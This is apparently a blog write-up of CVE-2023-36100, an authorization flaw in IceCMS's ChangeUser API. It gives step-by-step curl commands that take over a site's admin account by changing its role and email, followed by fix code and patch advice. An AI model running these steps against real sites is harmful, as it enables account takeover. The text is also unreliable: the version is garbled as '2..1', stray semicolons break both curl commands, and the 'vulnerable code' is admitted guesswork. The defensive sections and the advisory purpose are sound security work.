CVE-2023-36100 - Privilege Escalation and Sensitive Information Disclosure in IceCMS 2..1

In mid-2023, a serious vulnerability — CVE-2023-36100 — was discovered in the popular open-source content management system IceCMS (version 2..1). Attackers can use this flaw to escalate their privileges and access sensitive data without proper authorization, by abusing how the software handles the UserID parameter in the /api/User/ChangeUser endpoint.

This post provides an exclusive, easy-to-understand deep dive into how the vulnerability works, example exploit code, and ways to protect affected systems. All technical jargon is explained, so even readers new to web security can follow along.

Background: What is IceCMS?

IceCMS is an open-source PHP CMS designed for speed and extensibility. It is used by small to medium websites for managing content, users, and more. Like many modern CMS platforms, IceCMS offers a REST API, including an endpoint for changing user data.

CVE-2023-36100 targets the /api/User/ChangeUser API endpoint. Here’s the core problem

- This endpoint allows users to change details (like name, email, or password) by providing a UserID and other new data.
- However, *it does not* properly check if the currently authenticated user is allowed to change information for the given UserID.

The vulnerable endpoint accepts POST or PATCH requests with JSON data like below

{
  "UserID": 2,
  "email": "attacker@example.com",
  "role": "admin"
}

Normally, users should *only* be able to update their own UserID, and privilege escalation (like changing role to "admin") should be restricted or validated on the server side.

But due to the bug, a normal user can update *any* field for *any* user, simply by knowing (or guessing) a valid UserID.

Step-by-Step Exploit Example

Let’s say the attacker is user ID 5 (regular privilege) and wants admin rights (assume admin is user ID 1):

#### 1. Log in and obtain a session/cookie

curl -X POST "http://victim.site/api/User/Login"; \
  -H "Content-Type: application/json" \
  -d '{"username":"hacker","password":"hackpass"}' \
  -c cookies.txt

2. Send privilege escalation request

curl -X PATCH "http://victim.site/api/User/ChangeUser"; \
  -H "Content-Type: application/json" \
  -b cookies.txt \
  -d '{"UserID": 1, "role": "admin", "email": "attacker@example.com"}'

This request changes the admin’s email (to something the attacker owns) and/or role, depending on fields modified.

3. Reset admin password

If there's a “forgot password” flow, the attacker can now trigger a reset link to their own email and set a new password for the admin account.

4. Full Admin Control

Upon logging in as admin, the attacker can read, delete, or modify any user or content, access system files, and escalate attacks further.

Here’s a simplified version of what the vulnerable code might look like inside IceCMS

// Pseudocode for api/User/ChangeUser
function ChangeUser($request) {
    $userId = $request['UserID'];
    $dataToUpdate = $request->except('UserID');
    // Missing: Authorization logic to check if current user owns $userId or is admin!
    User::where('id', $userId)->update($dataToUpdate);
    return response()->json(['status' => 'success']);
}

What’s missing?
There is *no* check to ensure the current user is authorized to update the specified UserID. Any logged-in user can change any account.

Original References

- NVD entry for CVE-2023-36100
- Packet Storm Security Advisory
- GitHub: IceCMS Repository

Fix: How to Patch the Issue

Developers: Always validate a user's permissions on every sensitive action, especially when updating user records.

Fixed PHP Example

function ChangeUser($request) {
    $userId = $request['UserID'];
    $currentUser = auth()->user();
    // Only allow user to update their own profile, unless they are admin
    if ($currentUser->id != $userId && $currentUser->role != 'admin') {
        return response()->json(['status' => 'error', 'message' => 'Unauthorized'], 403);
    }
    // PROCEED with update...
}

Users:
If your site runs IceCMS 2..1, update as soon as a patch is available or block external access to API endpoints in the meantime.

Update IceCMS to a fixed version as soon as possible.

- Monitor logs for suspicious use of /api/User/ChangeUser and mass changes.

Conclusion

CVE-2023-36100 is a glaring example of why authorization checks are *essential* in web applications. A single missing condition in just one API endpoint can put all site data and accounts in jeopardy.
If you’re a developer, always implement “least privilege” and defense-in-depth.
If you’re a user or admin, patch early and stay vigilant.

Stay safe and secure your sites!

*If you have any questions or want more practical security tips, reach out in the comments below.*


Disclosure: This write-up is for educational and defensive purposes only. Do not exploit sites you don't own or have permission to test.

Timeline

Published on: 09/01/2023 16:15:00 UTC
Last modified on: 09/07/2023 18:16:00 UTC